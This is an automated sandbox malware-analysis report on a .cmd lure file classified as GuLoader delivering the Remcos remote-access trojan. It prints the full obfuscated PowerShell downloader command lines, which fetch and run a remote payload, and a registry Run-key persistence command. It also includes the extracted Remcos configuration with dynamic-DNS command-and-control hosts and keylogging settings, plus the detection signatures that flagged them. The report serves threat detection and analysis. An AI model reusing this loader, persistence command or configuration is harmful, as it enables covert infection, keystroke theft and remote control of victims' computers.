Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Teklif talebi BAKVENTA-BAKUUsurpationens.cmd

Overview

General Information

Sample name:Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
Analysis ID:1435423
MD5:69288c7e16a8ce2177346b2c62231603
SHA1:87f0dad6634d4e6bedad3b505adb6c509fdc5f03
SHA256:b523b20d9df02eaf3cdbb3babbc50ac7cea1889c7a3f561d586b001c02615f8a
Tags:cmd
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7504 cmdline: powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7668 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7752 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8872 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 8948 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8992 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • chrome.exe (PID: 7864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 8048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 5288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mvourhjs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7504.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfbb5:$b2: ::FromBase64String(
              • 0xcf56:$s1: -join
              • 0x6702:$s4: +=
              • 0x67c4:$s4: +=
              • 0xa9eb:$s4: +=
              • 0xcb08:$s4: +=
              • 0xcdf2:$s4: +=
              • 0xcf38:$s4: +=
              • 0xf188:$s4: +=
              • 0xf208:$s4: +=
              • 0xf2ce:$s4: +=
              • 0xf34e:$s4: +=
              • 0xf524:$s4: +=
              • 0xf5a8:$s4: +=
              • 0xd671:$e4: Get-WmiObject
              • 0xd860:$e4: Get-Process
              • 0xd8b8:$e4: Start-Process
              amsi32_7752.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfb16:$b2: ::FromBase64String(
              • 0xcf56:$s1: -join
              • 0x6702:$s4: +=
              • 0x67c4:$s4: +=
              • 0xa9eb:$s4: +=
              • 0xcb08:$s4: +=
              • 0xcdf2:$s4: +=
              • 0xcf38:$s4: +=
              • 0xf188:$s4: +=
              • 0xf208:$s4: +=
              • 0xf2ce:$s4: +=
              • 0xf34e:$s4: +=
              • 0xf524:$s4: +=
              • 0xf5a8:$s4: +=
              • 0xd671:$e4: Get-WmiObject
              • 0xd860:$e4: Get-Process
              • 0xd8b8:$e4: Start-Process
              • 0x17225:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8948, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stagenes
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 